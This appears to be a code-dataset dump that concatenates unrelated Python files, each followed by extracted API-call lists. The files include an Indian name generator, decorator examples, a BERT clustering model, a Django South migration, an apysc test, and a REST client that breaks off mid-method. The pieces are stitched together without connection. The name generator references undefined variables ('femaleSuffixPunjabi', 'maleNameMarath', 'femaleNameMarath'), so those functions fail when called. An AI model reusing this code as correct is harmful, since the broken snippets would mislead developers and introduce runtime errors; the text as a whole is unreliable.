get_locale_name\n'), ((10176, 10227), 'babel.dates.format_date', 'format_date', (['d'], {'format': 'fmt', 'locale': 'self.locale_name'}), '(d, format=fmt, locale=self.locale_name)\n', (10187, 10227), False, 'from babel.dates import format_date\n'), ((10448, 10504), 'babel.dates.format_datetime', 'format_datetime', (['dt'], {'format': 'fmt', 'locale': 'self.locale_name'}), '(dt, format=fmt, locale=self.locale_name)\n', (10463, 10504), False, 'from babel.dates import format_datetime\n'), ((10631, 10682), 'babel.dates.format_time', 'format_time', (['t'], {'format': 'fmt', 'locale': 'self.locale_name'}), '(t, format=fmt, locale=self.locale_name)\n', (10642, 10682), False, 'from babel.dates import format_time\n'), ((10753, 10818), 'babel.numbers.format_currency', 'format_currency', (['n', 'currency'], {'format': 'fmt', 'locale': 'self.locale_name'}), '(n, currency, format=fmt, locale=self.locale_name)\n', (10768, 10818), False, 'from babel.numbers import format_currency\n'), ((12081, 12106), 'kotti.sanitizers.sanitize', 'sanitize', (['html', 'sanitizer'], {}), '(html, sanitizer)\n', (12089, 12106), False, 'from kotti.sanitizers import sanitize\n'), ((14213, 14244), 'kotti.resources.Content.name.like', 'Content.name.like', (['searchstring'], {}), '(searchstring)\n', (14230, 14244), False, 'from kotti.resources import Content\n'), ((14254, 14286), 'kotti.resources.Content.title.like', 'Content.title.like', (['searchstring'], {}), '(searchstring)\n', (14272, 14286), False, 'from kotti.resources import Content\n'), ((14296, 14334), 'kotti.resources.Content.description.like', 'Content.description.like', (['searchstring'], {}), '(searchstring)\n', (14320, 14334), False, 'from kotti.resources import Content\n'), ((1664, 1708), 'pyramid.settings.asbool', 'asbool', (['request.registry.settings[self.name]'], {}), '(request.registry.settings[self.name])\n', (1670, 1708), False, 'from pyramid.settings import asbool\n'), ((6434, 6463), 'pyramid.interfaces.ILocation.providedBy', 'ILocation.providedBy', (['context'], {}), '(context)\n', (6454, 6463), False, 'from pyramid.interfaces import ILocation\n'), ((6861, 6871), 'kotti.resources.get_root', 'get_root', ([], {}), '()\n', (6869, 6871), False, 'from kotti.resources import get_root\n'), ((7269, 7298), 'kotti.interfaces.INavigationRoot.providedBy', 'INavigationRoot.providedBy', (['o'], {}), '(o)\n', (7295, 7298), False, 'from kotti.interfaces import INavigationRoot\n'), ((7571, 7592), 'pyramid.location.lineage', 'lineage', (['self.context'], {}), '(self.context)\n', (7578, 7592), False, 'from pyramid.location import lineage\n'), ((8733, 8776), 'kotti.util.render_view', 'render_view', (['context', 'request', 'name', 'secure'], {}), '(context, request, name, secure)\n', (8744, 8776), False, 'from kotti.util import render_view\n'), ((8949, 8987), 'pyramid.renderers.render', 'render', (['renderer', 'kwargs', 'self.request'], {}), '(renderer, kwargs, self.request)\n', (8955, 8987), False, 'from pyramid.renderers import render\n'), ((9929, 9945), 'urllib.parse.urlencode', 'urlencode', (['query'], {}), '(query)\n', (9938, 9945), False, 'from urllib.parse import urlencode\n'), ((10406, 10432), 'datetime.datetime.fromtimestamp', 'datetime.fromtimestamp', (['dt'], {}), '(dt)\n', (10428, 10432), False, 'from datetime import datetime\n'), ((10884, 10898), 'kotti.get_settings', 'get_settings', ([], {}), '()\n', (10896, 10898), False, 'from kotti import get_settings\n'), ((11096, 11141), 'kotti.security.view_permitted', 'view_permitted', (['item', 'self.request', 'view_name'], {}), '(item, self.request, view_name)\n', (11110, 11141), False, 'from kotti.security import view_permitted\n'), ((11189, 11234), 'kotti.security.view_permitted', 'view_permitted', (['item', 'self.request', 'view_name'], {}), '(item, self.request, view_name)\n', (11203, 11234), False, 'from kotti.security import view_permitted\n'), ((13365, 13389), 'kotti.DBSession.query', 'DBSession.query', (['Content'], {}), '(Content)\n', (13380, 13389), False, 'from kotti import DBSession\n'), ((14686, 14711), 'kotti.DBSession.query', 'DBSession.query', (['Document'], {}), '(Document)\n', (14701, 14711), False, 'from kotti import DBSession\n'), ((14733, 14765), 'kotti.resources.Document.body.like', 'Document.body.like', (['searchstring'], {}), '(searchstring)\n', (14751, 14765), False, 'from kotti.resources import Document\n'), ((14767, 14787), 'sqlalchemy.not_', 'not_', (['generic_filter'], {}), '(generic_filter)\n', (14771, 14787), False, 'from sqlalchemy import not_\n'), ((2045, 2059), 'kotti.get_settings', 'get_settings', ([], {}), '()\n', (2057, 2059), False, 'from kotti import get_settings\n'), ((5397, 5411), 'kotti.get_settings', 'get_settings', ([], {}), '()\n', (5409, 5411), False, 'from kotti import get_settings\n'), ((13903, 13917), 'kotti.get_settings', 'get_settings', ([], {}), '()\n', (13915, 13917), False, 'from kotti import get_settings\n'), ((14442, 14461), 'kotti.resources.Content.title.asc', 'Content.title.asc', ([], {}), '()\n', (14459, 14461), False, 'from kotti.resources import Content\n'), ((5090, 5114), 'pyramid.renderers.get_renderer', 'get_renderer', (['asset_spec'], {}), '(asset_spec)\n', (5102, 5114), False, 'from pyramid.renderers import get_renderer\n'), ((14367, 14391), 'kotti.DBSession.query', 'DBSession.query', (['Content'], {}), '(Content)\n', (14382, 14391), False, 'from kotti import DBSession\n'), ((15503, 15527), 'kotti.resources.Tag.title.like', 'Tag.title.like', (['tag_term'], {}), '(tag_term)\n', (15517, 15527), False, 'from kotti.resources import Tag\n'), ((15407, 15431), 'kotti.DBSession.query', 'DBSession.query', (['Content'], {}), '(Content)\n', (15422, 15431), False, 'from kotti import DBSession\n')]
|
import random
#Punjabi
#-----
mainNamePunjabi=["Gagan", "Har", "Bal", "Man", "Nav", "Sukh", "Kush", "Gur", "Karam", "Karan", "Dil", "Dharam", "Param", "Dal", "Jas", "Par", "Dul"]
maleSuffixPunjabi=["jeet", "jyot", "vinder", "preet", "meet"]
femleSuffixPunjabi=["preet", "jeet", "bir"]
unionSuffixPunjabi=maleSuffixPunjabi+femleSuffixPunjabi
def randomPunjabi():
namePunjabi=random.choice(mainNamePunjabi)+random.choice(unionSuffixPunjabi)
return namePunjabi
def malePunjabi():
namePunjabi=random.choice(mainNamePunjabi)+random.choice(maleSuffixPunjabi)
return namePunjabi
def femalePunjabi():
namePunjabi=random.choice(mainNamePunjabi)+random.choice(femaleSuffixPunjabi)
return namePunjabi
#-----
#Marathi
#-----
maleNameMarathi=["Aarav", "Kshitij", "Shantanu", "Onkar", "Aniket", "Atharva", "Prajwal", "Yash", "Abhijeet", "Ganesh", "Sachin", "Prathamesh", "Vaibhav", "Ninad", "Mihir", "Tejas", "Suyash", "Sanket", "Devang", "Darshan", "Soham", "Rohit", "Manish", "Aadesh", "Siddhesh",
"Aakash", "Anmol", "Chaitanya", "Dharmesh", "Gagan", "Gaurav", "Gopal", "Ishan", "Mehul", "Om", "Rahul", "Sandesh", "Tanmay", "Tushar", "Utkarsh",
"Vedang", "Varun", "Vinay", "Vivek", "Yogesh"]
femaleNameMarathi=["Vaishnavi", "Maithili", "Pooja", "Smital", "Shivani", "Veerja", "Shruti", "Aditi", "Manali", "Anuja", "Pranali", "Saloni",
"Aabha", "Aakriti", "Aruni", "Akanksha", "Akshata", "Aboli", "Ankita", "Chaitrali", "Divya", "Dhriti", "Gargi", "Gayatri", "Gauravi", "Gautami", "Isha", "Ishika",
"Kajal", "Kalyani", "Neha", "Nishi", "Tanvi", "Yuti"]
unionNameMarathi=maleNameMarathi+femaleNameMarathi
def randomMarathi():
nameMarathi=random.choice(unionNameMarathi)
return nameMarathi
def maleMarathi():
nameMarathi=random.choice(maleNameMarath)
return nameMarathi
def femaleMarathi():
nameMarathi=random.choice(femaleNameMarath)
return nameMarathi
#-----
#Bengali
#-----
maleNameBengali=["Abhik", "Abhoy", "Achintya", "Arnab", "Benoy", "Bhaskor",
"Bipin", "Daiwik", "Debesh", "Hrishab", "Indroneel", "Palash", "Paritosh", "Shirshendu", "Shubhang",
"Sourav", "Subrata", "Tapan", "Gairik", "Ujjwal"]
femaleNameBengali=["Ankolika", "Arundhati", "Bidisha", "Bibhuti", "Bipasha", "Chaitali", "Debjani", "Debolina", "Drishti", "Durba", "Joyeeta", "Kajol", "Kshamya", "Indrani", "Lotika", "Mishti",
"Naisha", "Pakhi", "Paromita", "Piyali", "Sagarika", "Shorbari", "Shoma", "Sushmita", "Tavishi", "Tvisha", "Yoshita"]
unionNameBengali=maleNameBengali+femaleNameBengali
def randomBengali():
nameBengali=random.choice(unionNameBengali)
return nameBengali
def maleBengali():
nameBengali=random.choice(maleNameBengali)
return nameBengali
def femaleBengali():
nameBengali=random.choice(femaleNameBengali)
return nameBengali
#-----
#Gujarati
#-----
maleNameGujarati=["Dhaval", "Haanish", "Herik", "Jigar", "Jignesh", "Joshil", "Mukund", "Munjal", "Oresh", "Prakat", "Pratul",
"Praful", "Praveen", "Prerit", "Devang", "Pujesh", "Raghubeer", "Sanam", "Yaksh", "Ahem", "Yug", "Yuvan", "Ronak"]
femaleNameGujarati=["Hinal", "Hiral", "Havya", "Jaimini", "Komal", "Jigna", "Raashi", "Kavya", "Nutan", "Pranauthi", "Puruvi",
"Tanishka", "Vaishnavi", "Vanshi", "Vrishti", "Vritika", "Kanchan"]
unionNameGujarati=maleNameGujarati+femaleNameGujarati
def randomGujarati():
nameGujarati=random.choice(unionNameGujarati)
return nameGujarati
def maleGujarati():
nameGujarati=random.choice(maleNameGujarati)
return nameGujarati
def femaleGujarati():
nameGujarati=random.choice(femaleNameGujarati)
return nameGujarati
#-----
#Kannada
#-----
maleNameKannada=["Shreyas","Ganesh","Rishab","Ritvik","Ramesh","Abhhishek","Nandan","Kishen","Narayan","Aniket","Pawan","Hanumappa","Shiva","Rajath","Prateek","Prajwal","Ujval","Utaam","Mohit","Chetan","Dheeraj","Somshekar","Mahesh","Mallikarjun","Tony","Sukesh","Varun","Nikhil","Vasant","Deepak","Vasudev","Subrmanya","Vinay","hrihari","Santosh","Darshan","Vikshit","Amogh","Govind","Vittal","Jagganath","Shishir","Guru","Girish","Vikunt","Keshaw","Arya","Rahul","Rajesh","Shashidar","Venktash","Raman","Dhanush","Arjun","Karana","Kubera"]
femaleNameKannada=["Rachana","Divya","Renuka","Deeksha","Arpita","Ambruta","Bharathi","Seema","Shantala","Shoba","Kaveri","Priya","Prabha","Saraswati","Yeshaswini","Tejaswini","Sindhu","Ramya","Radhika","Shreya","Sameeksha","Chandana","Ganga","Meera","Nayana","Parvati","Shambavi","Sumana","Sridevi","Rishitha","Sneha","Vidya","Vaishanavi","Geetha","Veena","Kavita","Kavya","Kavana","Keerthi","Lavanya","Vandita","Vinuta","Aishwarya","Soundarya","Ananya","Samveetha","Bhavya","Bhagya","Girija","Gayatri","Anu","Dhanya","Krutika","Anjali"]
surnameKannada = ["Shenoy","Bhat","Pai","Kini","Hegede","Patil","Kotambri","Reddy","Rai","Shetty","Rao","Menasinkai","Ullagaddi" ,"Limbekai", "Ballolli", "Tenginkai", "Byali","Akki", "Doddamani", "Hadimani" , "Kattimani", "Bevinmarad", "Hunasimarad" , "Mirjankar", "Belagavi", "Hublikar" ,"Jamkhandi","Angadi", "Amavasya", "Kage", "Bandi", "Kuri", "Kudari", "Toppige", "Beegadkai", "Pyati" ,"Hanagi" ,"Rotti","Hebbar","Ballal","Rai"]
def maleKannada():
nameKannada=random.choice(maleNameKannada)+" " + random.choice(surnameKannada)
return nameKannada
def femaleKannada():
nameKannada=random.choice(femaleNameKannada)+" " + random.choice(surnameKannada)
return nameKannada
#-----
|
[
"random.choice"
] |
[((1676, 1707), 'random.choice', 'random.choice', (['unionNameMarathi'], {}), '(unionNameMarathi)\n', (1689, 1707), False, 'import random\n'), ((1763, 1792), 'random.choice', 'random.choice', (['maleNameMarath'], {}), '(maleNameMarath)\n', (1776, 1792), False, 'import random\n'), ((1850, 1881), 'random.choice', 'random.choice', (['femaleNameMarath'], {}), '(femaleNameMarath)\n', (1863, 1881), False, 'import random\n'), ((2569, 2600), 'random.choice', 'random.choice', (['unionNameBengali'], {}), '(unionNameBengali)\n', (2582, 2600), False, 'import random\n'), ((2656, 2686), 'random.choice', 'random.choice', (['maleNameBengali'], {}), '(maleNameBengali)\n', (2669, 2686), False, 'import random\n'), ((2744, 2776), 'random.choice', 'random.choice', (['femaleNameBengali'], {}), '(femaleNameBengali)\n', (2757, 2776), False, 'import random\n'), ((3367, 3399), 'random.choice', 'random.choice', (['unionNameGujarati'], {}), '(unionNameGujarati)\n', (3380, 3399), False, 'import random\n'), ((3458, 3489), 'random.choice', 'random.choice', (['maleNameGujarati'], {}), '(maleNameGujarati)\n', (3471, 3489), False, 'import random\n'), ((3550, 3583), 'random.choice', 'random.choice', (['femaleNameGujarati'], {}), '(femaleNameGujarati)\n', (3563, 3583), False, 'import random\n'), ((393, 423), 'random.choice', 'random.choice', (['mainNamePunjabi'], {}), '(mainNamePunjabi)\n', (406, 423), False, 'import random\n'), ((424, 457), 'random.choice', 'random.choice', (['unionSuffixPunjabi'], {}), '(unionSuffixPunjabi)\n', (437, 457), False, 'import random\n'), ((513, 543), 'random.choice', 'random.choice', (['mainNamePunjabi'], {}), '(mainNamePunjabi)\n', (526, 543), False, 'import random\n'), ((544, 576), 'random.choice', 'random.choice', (['maleSuffixPunjabi'], {}), '(maleSuffixPunjabi)\n', (557, 576), False, 'import random\n'), ((634, 664), 'random.choice', 'random.choice', (['mainNamePunjabi'], {}), '(mainNamePunjabi)\n', (647, 664), False, 'import random\n'), ((665, 699), 'random.choice', 'random.choice', (['femaleSuffixPunjabi'], {}), '(femaleSuffixPunjabi)\n', (678, 699), False, 'import random\n'), ((5225, 5254), 'random.choice', 'random.choice', (['surnameKannada'], {}), '(surnameKannada)\n', (5238, 5254), False, 'import random\n'), ((5351, 5380), 'random.choice', 'random.choice', (['surnameKannada'], {}), '(surnameKannada)\n', (5364, 5380), False, 'import random\n'), ((5188, 5218), 'random.choice', 'random.choice', (['maleNameKannada'], {}), '(maleNameKannada)\n', (5201, 5218), False, 'import random\n'), ((5312, 5344), 'random.choice', 'random.choice', (['femaleNameKannada'], {}), '(femaleNameKannada)\n', (5325, 5344), False, 'import random\n')]
|
def start_end_decorator(func):
def wrapper():
print('start')
func()
print('end')
return wrapper
@start_end_decorator # print_name = start_end_decorator(print_name)
def print_name():
print('serkan')
print_name()
import functools
def sum_of_digits(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
total_sum = 0
func_result = func(*args, **kwargs)
for digit in str(func_result):
total_sum += int(digit)
return total_sum
return wrapper
@sum_of_digits
def add_five(x):
return x + 5
x = add_five(11)
print(x)
print(help(add_five))
print(add_five.__name__)
# Decorator function arguments
def repeat(num_times):
def decorator_repeat(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
for _ in range(num_times):
result = func(*args, **kwargs)
return result
return wrapper
return decorator_repeat
@repeat(num_times=3)
def greet(name):
print(f"Hello {name}")
greet('Alex')
# a decorator function that prints debug information about the wrapped function
def debug(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
args_repr = [repr(a) for a in args]
kwargs_repr = [f"{k}={v!r}" for k, v in kwargs.items()]
signature = ", ".join(args_repr + kwargs_repr)
print(f"Calling {func.__name__}({signature})")
result = func(*args, **kwargs)
print(f"{func.__name__!r} returned {result!r}")
return result
return wrapper
def start_end_decorator_2(func):
def wrapper(*args, **kwargs):
func(*args, **kwargs)
print('End')
return wrapper
@debug
@start_end_decorator_2
def say_hello(name):
greeting = f'Hello {name}'
print(greeting)
return greeting
# now `debug` is executed first and calls `@start_end_decorator_4`, which then calls `say_hello`
say_hello(name='Alex')
import functools
class CountCalls:
# the init needs to have the func as argument and stores it
def __init__(self, func):
functools.update_wrapper(self, func)
self.func = func
self.num_calls = 0
# extend functionality, execute function, and return the result
def __call__(self, *args, **kwargs):
self.num_calls += 1
print(f"Call {self.num_calls} of {self.func.__name__!r}")
@CountCalls
def say_hello(num):
print("Hello!")
say_hello(5)
say_hello(5)
|
[
"functools.update_wrapper",
"functools.wraps"
] |
[((303, 324), 'functools.wraps', 'functools.wraps', (['func'], {}), '(func)\n', (318, 324), False, 'import functools\n'), ((1184, 1205), 'functools.wraps', 'functools.wraps', (['func'], {}), '(func)\n', (1199, 1205), False, 'import functools\n'), ((768, 789), 'functools.wraps', 'functools.wraps', (['func'], {}), '(func)\n', (783, 789), False, 'import functools\n'), ((2121, 2157), 'functools.update_wrapper', 'functools.update_wrapper', (['self', 'func'], {}), '(self, func)\n', (2145, 2157), False, 'import functools\n')]
|
"""
Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved
Author: <NAME> (<EMAIL>)
Date: 02/26/2021
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import Parameter
# from transformers import AutoModel, AutoTokenizer
class SCCLBert(nn.Module):
def __init__(self, bert_model, cluster_centers=None, alpha=1.0):
super(SCCLBert, self).__init__()
print(bert_model[0].tokenizer)
self.tokenizer = bert_model[0].tokenizer
self.sentbert = bert_model[0].auto_model
self.emb_size = self.sentbert.config.hidden_size
self.alpha = alpha
print(self.emb_size)
# Instance-CL head
self.head = nn.Sequential(
nn.Linear(self.emb_size, self.emb_size),
nn.ReLU(inplace=True),
nn.Linear(self.emb_size, 128))
# Clustering head
initial_cluster_centers = torch.tensor(
cluster_centers, dtype=torch.float, requires_grad=True)
self.cluster_centers = Parameter(initial_cluster_centers)
def get_embeddings(self, features, pooling="mean"):
bert_output = self.sentbert.forward(**features)
attention_mask = features['attention_mask'].unsqueeze(-1)
all_output = bert_output[0]
mean_output = torch.sum(all_output*attention_mask, dim=1) / torch.sum(attention_mask, dim=1)
return mean_output
def get_cluster_prob(self, embeddings):
norm_squared = torch.sum((embeddings.unsqueeze(1) - self.cluster_centers) ** 2, 2)
numerator = 1.0 / (1.0 + (norm_squared / self.alpha))
power = float(self.alpha + 1) / 2
numerator = numerator ** power
return numerator / torch.sum(numerator, dim=1, keepdim=True)
def local_consistency(self, embd0, embd1, embd2, criterion):
p0 = self.get_cluster_prob(embd0)
p1 = self.get_cluster_prob(embd1)
p2 = self.get_cluster_prob(embd2)
lds1 = criterion(p1, p0)
lds2 = criterion(p2, p0)
return lds1+lds2
|
[
"torch.nn.Parameter",
"torch.nn.ReLU",
"torch.nn.Linear",
"torch.sum",
"torch.tensor"
] |
[((912, 980), 'torch.tensor', 'torch.tensor', (['cluster_centers'], {'dtype': 'torch.float', 'requires_grad': '(True)'}), '(cluster_centers, dtype=torch.float, requires_grad=True)\n', (924, 980), False, 'import torch\n'), ((1025, 1059), 'torch.nn.Parameter', 'Parameter', (['initial_cluster_centers'], {}), '(initial_cluster_centers)\n', (1034, 1059), False, 'from torch.nn import Parameter\n'), ((733, 772), 'torch.nn.Linear', 'nn.Linear', (['self.emb_size', 'self.emb_size'], {}), '(self.emb_size, self.emb_size)\n', (742, 772), True, 'import torch.nn as nn\n'), ((786, 807), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (793, 807), True, 'import torch.nn as nn\n'), ((821, 850), 'torch.nn.Linear', 'nn.Linear', (['self.emb_size', '(128)'], {}), '(self.emb_size, 128)\n', (830, 850), True, 'import torch.nn as nn\n'), ((1297, 1342), 'torch.sum', 'torch.sum', (['(all_output * attention_mask)'], {'dim': '(1)'}), '(all_output * attention_mask, dim=1)\n', (1306, 1342), False, 'import torch\n'), ((1343, 1375), 'torch.sum', 'torch.sum', (['attention_mask'], {'dim': '(1)'}), '(attention_mask, dim=1)\n', (1352, 1375), False, 'import torch\n'), ((1709, 1750), 'torch.sum', 'torch.sum', (['numerator'], {'dim': '(1)', 'keepdim': '(True)'}), '(numerator, dim=1, keepdim=True)\n', (1718, 1750), False, 'import torch\n')]
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'DriveProfile'
db.create_table('profiles_driveprofile', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('user', self.gf('django.db.models.fields.related.ForeignKey')(unique=True, to=orm['auth.User'])),
('family_name', self.gf('django.db.models.fields.CharField')(max_length=50, blank=True)),
('given_name', self.gf('django.db.models.fields.CharField')(max_length=50, blank=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=101, blank=True)),
('gender', self.gf('django.db.models.fields.CharField')(max_length=10, blank=True)),
('email', self.gf('django.db.models.fields.EmailField')(max_length=75, blank=True)),
('verified_email', self.gf('django.db.models.fields.NullBooleanField')(null=True, blank=True)),
('locale', self.gf('django.db.models.fields.CharField')(max_length=5, blank=True)),
('google_id', self.gf('django.db.models.fields.CharField')(max_length=50, blank=True)),
('link', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
))
db.send_create_signal('profiles', ['DriveProfile'])
def backwards(self, orm):
# Deleting model 'DriveProfile'
db.delete_table('profiles_driveprofile')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80', 'unique': 'True'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'blank': 'True', 'to': "orm['auth.Permission']"})
},
'auth.permission': {
'Meta': {'object_name': 'Permission', 'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)"},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True', 'related_name': "'user_set'"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True', 'related_name': "'user_set'"}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '30', 'unique': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'object_name': 'ContentType', 'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'profiles.driveprofile': {
'Meta': {'object_name': 'DriveProfile'},
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'family_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '10', 'blank': 'True'}),
'given_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'google_id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'locale': ('django.db.models.fields.CharField', [], {'max_length': '5', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '101', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'unique': 'True', 'to': "orm['auth.User']"}),
'verified_email': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'})
},
'profiles.gmailprofile': {
'Meta': {'object_name': 'GmailProfile'},
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'family_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '10', 'blank': 'True'}),
'given_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'google_id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'locale': ('django.db.models.fields.CharField', [], {'max_length': '5', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '101', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'unique': 'True', 'to': "orm['auth.User']"}),
'verified_email': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['profiles']
|
[
"south.db.db.delete_table",
"south.db.db.send_create_signal"
] |
[((1426, 1477), 'south.db.db.send_create_signal', 'db.send_create_signal', (['"""profiles"""', "['DriveProfile']"], {}), "('profiles', ['DriveProfile'])\n", (1447, 1477), False, 'from south.db import db\n'), ((1558, 1598), 'south.db.db.delete_table', 'db.delete_table', (['"""profiles_driveprofile"""'], {}), "('profiles_driveprofile')\n", (1573, 1598), False, 'from south.db import db\n')]
|
from random import randint
from retrying import retry
import apysc as ap
from apysc._display.line_dot_setting import LineDotSetting
class TestLineDotSetting:
@retry(stop_max_attempt_number=15, wait_fixed=randint(10, 3000))
def test___init__(self) -> None:
setting: LineDotSetting = LineDotSetting(dot_size=5)
assert isinstance(setting._value['dot_size'], ap.Int)
assert setting._value['dot_size'] == 5
setting = LineDotSetting(dot_size=ap.Int(10))
assert setting._value['dot_size'] == 10
@retry(stop_max_attempt_number=15, wait_fixed=randint(10, 3000))
def test_dot_size(self) -> None:
setting: LineDotSetting = LineDotSetting(dot_size=5)
assert setting.dot_size == 5
assert isinstance(setting.dot_size, ap.Int)
|
[
"apysc._display.line_dot_setting.LineDotSetting",
"random.randint",
"apysc.Int"
] |
[((315, 341), 'apysc._display.line_dot_setting.LineDotSetting', 'LineDotSetting', ([], {'dot_size': '(5)'}), '(dot_size=5)\n', (329, 341), False, 'from apysc._display.line_dot_setting import LineDotSetting\n'), ((704, 730), 'apysc._display.line_dot_setting.LineDotSetting', 'LineDotSetting', ([], {'dot_size': '(5)'}), '(dot_size=5)\n', (718, 730), False, 'from apysc._display.line_dot_setting import LineDotSetting\n'), ((223, 240), 'random.randint', 'randint', (['(10)', '(3000)'], {}), '(10, 3000)\n', (230, 240), False, 'from random import randint\n'), ((612, 629), 'random.randint', 'randint', (['(10)', '(3000)'], {}), '(10, 3000)\n', (619, 629), False, 'from random import randint\n'), ((498, 508), 'apysc.Int', 'ap.Int', (['(10)'], {}), '(10)\n', (504, 508), True, 'import apysc as ap\n')]
|
"""
Copyright (c) 2017 IBM Corp.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import requests
import json
from os import getenv
HOST= 'patchport-http.mybluemix.net'
VER = 'v0'
TOKEN = getenv("TOKEN")
if not TOKEN:
print ("Set env variable TOKEN with the access token if you want to access the remote API.")
class Remote(object):
def __init__(self):
self.APIurl = "https://%s/api/%s" % (HOST, VER)
self.token = TOKEN
def _requestPOST(self, path, data={}):
headers = {'content-type': 'application/json'}
u = "%s/%s?access_token=%s" % (self.APIurl, path, self.token)
r = requests.post(u,data=data,headers=headers)
if not r.status_code == 200:
raise Exception('Error %d: %s\n%s' % (r.status_code,r.reason,u))
return r.json()
def _requestPATCH(self, path, data={}):
headers = {'content-type': 'application/json'}
u = "%s/%s?access_token=%s" % (self.APIurl, path, self.token)
r = requests.patch(u,data=data,headers=headers)
if not r.status_code == 200:
raise Exception('Error %d: %s\n%s' % (r.status_code,r.reason,u))
return r.json()
def _requestDELETE(self, path):
u = "%s/%s?access_token=%s" % (self.APIurl, path, self.token)
r = requests.delete(u)
if not r.status_code == 200:
raise Exception('Error %d: %s\n%s' % (r.status_code,r.reason,u))
return r.json()
def _requestGET(self, path, where=None, order=None, limit=None):
filter = {}
if where:
filter["where"] = where
if order:
filter["order"] = order
if limit:
filter["limit"] = limit
u = "%s/%s?filter=%s&access_token=%s" % (self.APIurl, path, json.dumps(filter), self.token)
r = requests.get(u)
if not r.status_code == 200:
raise Exception('Error %d: %s\n%s' % (r.status_code,r.reason,u))
return r.json()
def _findById(self,path, id):
# Is it a local file (instead of a remote id). This is just for debugging and should be removed TODO
